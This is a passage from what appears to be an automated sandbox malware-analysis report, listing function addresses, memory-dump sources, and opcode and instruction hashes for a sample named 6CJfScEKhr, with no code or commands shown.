                                                                      • Opcode Fuzzy Hash: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
                                                                      • Instruction Fuzzy Hash: 04D09E36200118BF9B05DE84DC41CA6BB6AEB89660B14C45AFD1547351CAB3ED22DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7FAB0 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1114250f399c77fd2db586dbee5266846c7626909453b75ed8e31e8c0394f8c0
                                                                      • Instruction ID: 65a6fab910065df72d3489de2d7e3ece29348375aeb5f407d674ea96ac4bb04e
                                                                      • Opcode Fuzzy Hash: 1114250f399c77fd2db586dbee5266846c7626909453b75ed8e31e8c0394f8c0
                                                                      • Instruction Fuzzy Hash: 7AD0C7B42497814FC341C624CC91456BFA1E795504714D5ADD485C7353CE21DC07D714
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7AC61 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf981d295dc9c809a34c7f78540c65ab47821abfaccb50df519e8d1906fcc190
                                                                      • Instruction ID: cccc50e38df09e42e1bd7e3dedb28518521787a53aae70897dcbca8bd945b892
                                                                      • Opcode Fuzzy Hash: bf981d295dc9c809a34c7f78540c65ab47821abfaccb50df519e8d1906fcc190
                                                                      • Instruction Fuzzy Hash: B2D0C9A56082816FC341CA64DC91851BFF5EBDA619718C1AAE48987252DA21DC13CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A122E8 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e050b8aaea129cec1b993cf3924fab9557564ca9b0047fdcce1d96f6085c382e
                                                                      • Instruction ID: e7cdc16764bee158736a8a0298c672d9b3950cad1546fe127f3f09e841c7d96d
                                                                      • Opcode Fuzzy Hash: e050b8aaea129cec1b993cf3924fab9557564ca9b0047fdcce1d96f6085c382e
                                                                      • Instruction Fuzzy Hash: C9D0C9796051516FE344C628CC42F67AB95DBC8214F18C46DB489C7351DA35EE52C660
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D75068 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 103ef325ee6212b4990ecff7430e3ac762de9ae59c771b372f4ad6f1fc2ab4b0
                                                                      • Instruction ID: e746303b12175ee8ba744a161b926ec15a223f660f90c3e0450d043b5e70bed2
                                                                      • Opcode Fuzzy Hash: 103ef325ee6212b4990ecff7430e3ac762de9ae59c771b372f4ad6f1fc2ab4b0
                                                                      • Instruction Fuzzy Hash: 1BD0676024D2C15FC303DA688DA4496BFE59E8A210B1888BE98C8CB2A3C625E81BD655
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7C152 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a0a2a9d1b7e4a042294a72c533278be6feef0772ab3dd38d07f680caba500a7
                                                                      • Instruction ID: 380fb9299d79dec19e8a4e2c7793eeeeb196c215fbe8842d7c8819dee762ff7a
                                                                      • Opcode Fuzzy Hash: 2a0a2a9d1b7e4a042294a72c533278be6feef0772ab3dd38d07f680caba500a7
                                                                      • Instruction Fuzzy Hash: 6DD0A9766142028FE244CA00E8819AAB362EBE4714B08C86EE81047305CF22CC03C760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7F478 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 50501098d5ba2cfb012bdc76b4996b35ff8cd128e3799dcfff8d323c61b9676e
                                                                      • Instruction ID: e71b9fb2b99f87390cd49d9ea8b4b786e3cfd5cb2d1b00e3a63c8df309f84d9d
                                                                      • Opcode Fuzzy Hash: 50501098d5ba2cfb012bdc76b4996b35ff8cd128e3799dcfff8d323c61b9676e
                                                                      • Instruction Fuzzy Hash: 4AD0A7641083805FC381C730C8A2451BFA1DB86204314CAD9E4C5C3357CD25DC03C710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7B808 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 217d09a92102dace53b3716ae2081a4ed199ffde5c7e8dc8da307c3b6d63ba4f
                                                                      • Instruction ID: a3740b353e9323c4666bafd8c2cdb72294077026a9b1eff1ba909c83d352f94f
                                                                      • Opcode Fuzzy Hash: 217d09a92102dace53b3716ae2081a4ed199ffde5c7e8dc8da307c3b6d63ba4f
                                                                      • Instruction Fuzzy Hash: 3FD0A7B530C3805FC245DB14D860C33BBA6EBD9200B148C5EE496CB792CA21DC17CB31
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7BC08 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bce54a8277776e4ab9070f3035394e5f534b9219a38532acaddf75fdcae326cf
                                                                      • Instruction ID: cfc1862cfde5b6ab2c29f485a2d94129f8b5ac4c8f5782e78cd5b8c804ba42bc
                                                                      • Opcode Fuzzy Hash: bce54a8277776e4ab9070f3035394e5f534b9219a38532acaddf75fdcae326cf
                                                                      • Instruction Fuzzy Hash: C2D022B6D102009FD380C624C84358ABBD0CB6A210B46C4B9C8098F302DA31CD0387A4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A15C80 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 920ef03e4c066f6678fdb5a939ca65199ca312829f5394dae03bb7dc2bbe64ab
                                                                      • Instruction ID: 75d37e6e29806bcb43bde8e6aa6ed727d13d978e05e76ea6a89e819f34ff6c3e
                                                                      • Opcode Fuzzy Hash: 920ef03e4c066f6678fdb5a939ca65199ca312829f5394dae03bb7dc2bbe64ab
                                                                      • Instruction Fuzzy Hash: 5DD0C97290110CEF9B01EFE8C94189EBBEDDB46204B1045B69509D7210EA315B5067A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A1EDD0 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 64d5dbe24861bf133f46f5125439aa90f29ed8963b61dcdf2879b034fc6ea83d
                                                                      • Instruction ID: 6476f8e1115762fdf0fb9f467bdf724ce62a32c83b39978adff3dc66e413a8b8
                                                                      • Opcode Fuzzy Hash: 64d5dbe24861bf133f46f5125439aa90f29ed8963b61dcdf2879b034fc6ea83d
                                                                      • Instruction Fuzzy Hash: 5CD0C9B290110CEF9B01DFE4C90189EBBEDDB45214B1046A69509D7210EA315B5067A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A158D8 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 303d56aa7c46b5c8472160b811fe3c9cfd6e8ae10e0543f206d74409f6f3851c
                                                                      • Instruction ID: 58b418494943cc6b852ac696cbc8a1311bc75063b1e66a7a2cd46564250d7d61
                                                                      • Opcode Fuzzy Hash: 303d56aa7c46b5c8472160b811fe3c9cfd6e8ae10e0543f206d74409f6f3851c
                                                                      • Instruction Fuzzy Hash: DFD0A7715051406FD341C770CC45E53FF94CB67214F59C19CD45986252C626C5078350
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A189E8 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8c1386fdd234a943e6cf5b56d9024b9771b43522ce35d3e92b28e8569a00b9e4
                                                                      • Instruction ID: e8c7a44d3e3c6855374853c4b04b3b9139ac0e25771d3edd65391069824fabb0
                                                                      • Opcode Fuzzy Hash: 8c1386fdd234a943e6cf5b56d9024b9771b43522ce35d3e92b28e8569a00b9e4
                                                                      • Instruction Fuzzy Hash: E6D0C9B294510CEF9B41DFE8C90199EBBEDDB45204F1045A69609D7220EA315B50A7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A16120 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1307a0015ebceb7a02b599f778becca5344b9370fe3461efc12c2edc062d3ee7
                                                                      • Instruction ID: 0e5c87a0c5ea65347049cca069d9e1c10829c235013e3912be286a34a56d6e98
                                                                      • Opcode Fuzzy Hash: 1307a0015ebceb7a02b599f778becca5344b9370fe3461efc12c2edc062d3ee7
                                                                      • Instruction Fuzzy Hash: A7D0C97290120CEF9B01DFE4C90199EBBEDDB45204B1046E6D509D7224EA315B5067A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A11BE8 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4062300a9fdf65e9ad7e84624391332e024435f1c034fb2ed36beb783b8229ab
                                                                      • Instruction ID: c85b0237cb70098d2927d3bb819b4f82faa82943577695112111c93f0150640f
                                                                      • Opcode Fuzzy Hash: 4062300a9fdf65e9ad7e84624391332e024435f1c034fb2ed36beb783b8229ab
                                                                      • Instruction Fuzzy Hash: 27D092352001029BD394CA58CD46B92F3E5EB94214F28C46DA888C6351EA79EC82CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A13370 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0d9d182e6cf71435326845dd899146bfff950ec7627b32532bda3e6c6e43a76
                                                                      • Instruction ID: 1a8e0493e515dc7b167b026afe190b34d49570d1f9e1fc38dfa9717adb7cad4f
                                                                      • Opcode Fuzzy Hash: a0d9d182e6cf71435326845dd899146bfff950ec7627b32532bda3e6c6e43a76
                                                                      • Instruction Fuzzy Hash: 6AD0C97290110CEF9B01DFE4C90199EBBEDDB45204B1045F6A509D7210EA315B5067A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D75040 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f40a9f05ac9cf9617f4ded7bf4593d137ecf92ece12eb4b852c1c1dc691f2598
                                                                      • Instruction ID: 23fa7ce28f1dec8725245c5d417f9c31ff5ed2d9a9077166ec14c6a2bf11ad98
                                                                      • Opcode Fuzzy Hash: f40a9f05ac9cf9617f4ded7bf4593d137ecf92ece12eb4b852c1c1dc691f2598
                                                                      • Instruction Fuzzy Hash: 6DD0C97290120CEF8B01DFE4C94189EBBEDEB45200F1046A69509D7250EA325B5067A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D78020 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 18ffabdac5172a9b3417df7e4063975c1f524ae9e5c744d0075f3bce6e1c214e
                                                                      • Instruction ID: 8c7a69b70af71404be41dca55e0a9824734a0b4c364ca2b33f55027e016f166a
                                                                      • Opcode Fuzzy Hash: 18ffabdac5172a9b3417df7e4063975c1f524ae9e5c744d0075f3bce6e1c214e
                                                                      • Instruction Fuzzy Hash: 79D0C97294110CEF9B01DFE4D90189EBBEDDB45204F10C5A69509D7264EA315B5467A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7D1A0 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8da0743853dbe0383c8ed20f5613e6d511fe95070d3553deee2c59879e2c7665
                                                                      • Instruction ID: 0810e21046fa81dcdda7a63f138b042dace5ad2e119168593f26eee2683f367a
                                                                      • Opcode Fuzzy Hash: 8da0743853dbe0383c8ed20f5613e6d511fe95070d3553deee2c59879e2c7665
                                                                      • Instruction Fuzzy Hash: E0D0A97280010CEF8B00DFE0C80188EBBECDB00200B1082A69408D3210EA315B0067A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7D2D8 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e469db33dbafe0fdb5ae03cba5c9ad12c66b8c3e2e0f3e133d1faa0b6f0db6e4
                                                                      • Instruction ID: 9776561ad9e4bccbbcef1cc3fe33382058232fb79513d69cfa7c7d724acabcc3
                                                                      • Opcode Fuzzy Hash: e469db33dbafe0fdb5ae03cba5c9ad12c66b8c3e2e0f3e133d1faa0b6f0db6e4
                                                                      • Instruction Fuzzy Hash: B6D0A7742097404FD341C720C8D1845BF61DFD5214725C5BDD48687293CE31C903C711
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7C290 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 785e72cea51698083c78a7d0b2700f4944ec67fe01bb38fb2d21fe6f7ff95754
                                                                      • Instruction ID: be7c86fcd5d2fa583f40096fb84e6999d3e8a0d9eab5977313dac5cfb453edf7
                                                                      • Opcode Fuzzy Hash: 785e72cea51698083c78a7d0b2700f4944ec67fe01bb38fb2d21fe6f7ff95754
                                                                      • Instruction Fuzzy Hash: 02D0C97290110CEF9B01DFE4DA4199EBBEDDB45204B1085A69509D7251EA316B50A7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D773A0 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 43c2a8f48a79b6f6f9ca7bfb8cea5effb59755c67e7e4fa78f2cc9668d4ad11f
                                                                      • Instruction ID: f7c358cff0e069d44ef0b712e7d1c3defbd73b84d883440ab9cf9db7c9f150d1
                                                                      • Opcode Fuzzy Hash: 43c2a8f48a79b6f6f9ca7bfb8cea5effb59755c67e7e4fa78f2cc9668d4ad11f
                                                                      • Instruction Fuzzy Hash: 97D0C97290110CEF9F01DFE5D90189EBBFDDB45204B1085A69909E7250EE315B5067A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D75318 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0c7971ecf85e038470bbc2fc5f1bcbbcc1db832a5ba12fbb82dba4961211234c
                                                                      • Instruction ID: 0a61dcd66102d2586431f0273e73f9274e80d5f375b9fc2dc54b56c63db3260a
                                                                      • Opcode Fuzzy Hash: 0c7971ecf85e038470bbc2fc5f1bcbbcc1db832a5ba12fbb82dba4961211234c
                                                                      • Instruction Fuzzy Hash: F3D0C972D0120CEF8B01DFE4C90289EBBEDEB45600B1045B69909D7210EA315B5067A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D794B0 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8e5491b98a3fd054f805cdc90efa1cdb82a51231a31908dc77b91f1df3a91765
                                                                      • Instruction ID: 0fa38cf9e2f1c07438878f08d53307bcf002b50fb4e8ee4ed882b296d9f79b8a
                                                                      • Opcode Fuzzy Hash: 8e5491b98a3fd054f805cdc90efa1cdb82a51231a31908dc77b91f1df3a91765
                                                                      • Instruction Fuzzy Hash: F2D05EF160E3814FD381CA10C864846BFA1EF96204F14C8EEE4914B2A2CB61CC07CB11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D795B8 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8eeb7005b5befd059f681ec8ebd057d14b7c92125ad229267c6d0b3ac399c585
                                                                      • Instruction ID: 3b2b5a36bd61694a292007b5508f6ca2d4bafca6e9a9ea94e0b2a5f476ea144a
                                                                      • Opcode Fuzzy Hash: 8eeb7005b5befd059f681ec8ebd057d14b7c92125ad229267c6d0b3ac399c585
                                                                      • Instruction Fuzzy Hash: BBD0C97290110CEF9B41EFE4D90189EBBEDDB45204F1085AA9509D7250EA315B5067A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D78559 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 84987f7eea285dbdeb69abf7a963a114c7170e5fd6717575eabbe9edafe9960a
                                                                      • Instruction ID: 1d9183b0fc410f4a88977d5502eb5d0a3c4e9472c239d3640dc998caad0ad9d8
                                                                      • Opcode Fuzzy Hash: 84987f7eea285dbdeb69abf7a963a114c7170e5fd6717575eabbe9edafe9960a
                                                                      • Instruction Fuzzy Hash: 6BD0A7712082914FD244CB28E4909E2FBA1FFD6204F18CC4DE4D503306C6219C17CB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D778E8 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c90a0da543a711d00cde24b4b1a741947351a962a49c11d1f921b5146362acfe
                                                                      • Instruction ID: 3f44b71d3b33a6d0700fd8d00786d99264ec79e7bcc88ca2fd0dbc48e70f31f9
                                                                      • Opcode Fuzzy Hash: c90a0da543a711d00cde24b4b1a741947351a962a49c11d1f921b5146362acfe
                                                                      • Instruction Fuzzy Hash: 23D0C97290110CEF9B01EFE4D90299EBBEDDB45204B1085A69509DB250EA315B506BE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D70980 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 391d9911fb7c0c8177002e0799ff860d9df31ee6b1a8b7eaf0666115a5aa8663
                                                                      • Instruction ID: 88122c2a1060aeaf2557e768c0a43c212b48af64e60923213b4da7763ee362da
                                                                      • Opcode Fuzzy Hash: 391d9911fb7c0c8177002e0799ff860d9df31ee6b1a8b7eaf0666115a5aa8663
                                                                      • Instruction Fuzzy Hash: 50D0C77190210CEF8B10DFE5D90549EB7FDEB45205B1141B59505D3310EA315B905B92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7FA10 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cd77fd6acf9ed2057ff0d917baacbac81cdfb68d4548c35c639f0687f04184ec
                                                                      • Instruction ID: a2e6aca48ff440d3d8d8d296088e8c791bd7b09afae31c241c7d69bef75294b6
                                                                      • Opcode Fuzzy Hash: cd77fd6acf9ed2057ff0d917baacbac81cdfb68d4548c35c639f0687f04184ec
                                                                      • Instruction Fuzzy Hash: B5D0C9B290110CEF9B01DFE4D90189EBBEDDB45204B1085A69509D7262EA325B5067A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D79A30 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 004b80a61366df4112826e62bcb8f825ca139dfa4dca0facb4f7bbb926c323ae
